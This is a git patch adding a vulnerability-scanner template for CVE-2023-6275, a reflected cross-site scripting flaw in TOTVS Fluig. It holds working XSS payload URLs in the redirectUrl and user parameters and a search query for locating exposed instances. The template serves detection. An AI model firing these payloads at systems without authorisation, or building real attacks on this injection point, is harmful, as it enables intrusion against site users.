From d26ad5047331ce9258e8f1f9f277ac934d71e2cd Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 18 Sep 2024 13:17:46 +0300 Subject: [PATCH 1/2] add CVE-2023-6275 --- http/cves/2023/CVE-2023-6275.yaml | 52 +++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6275.yaml diff --git a/http/cves/2023/CVE-2023-6275.yaml b/http/cves/2023/CVE-2023-6275.yaml new file mode 100644 index 00000000000..84f450d2076 --- /dev/null +++ b/http/cves/2023/CVE-2023-6275.yaml @@ -0,0 +1,52 @@ +id: CVE-2023-6275 + +info: + name: TOTVS Fluig Platform - Cross-Site Scripting + author: s4e-io + severity: medium + description: | + A vulnerability was found in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /mobileredir/openApp.jsp of the component mobileredir. The manipulation of the argument redirectUrl/user with the input "> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. + reference: + - https://github.com/erickfernandox/CVE-2023-6275 + - https://nvd.nist.gov/vuln/detail/CVE-2023-6275 + - https://vuldb.com/?id.246104 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-6275 + cwe-id: CWE-79 + epss-score: 0.00075 + epss-percentile: 0.33269 + cpe: cpe:2.3:a:totvs:fluig:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: totvs + product: fluig + fofa-query: app="TOTVS-Fluig" + tags: cve,cve2023,xss,fluig + +http: + - method: GET + path: + - "{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - 'fluig://' + condition: and + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200 From 9098716713a49388fc1b0788e68ae4c67a2108b0 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 18 Sep 2024 13:24:05 +0300 Subject: [PATCH 2/2] init fix --- http/cves/2023/CVE-2023-6275.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-6275.yaml b/http/cves/2023/CVE-2023-6275.yaml index 84f450d2076..26d17c379d3 100644 --- a/http/cves/2023/CVE-2023-6275.yaml +++ b/http/cves/2023/CVE-2023-6275.yaml @@ -29,8 +29,8 @@ info: http: - method: GET path: - - "{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true matchers-condition: and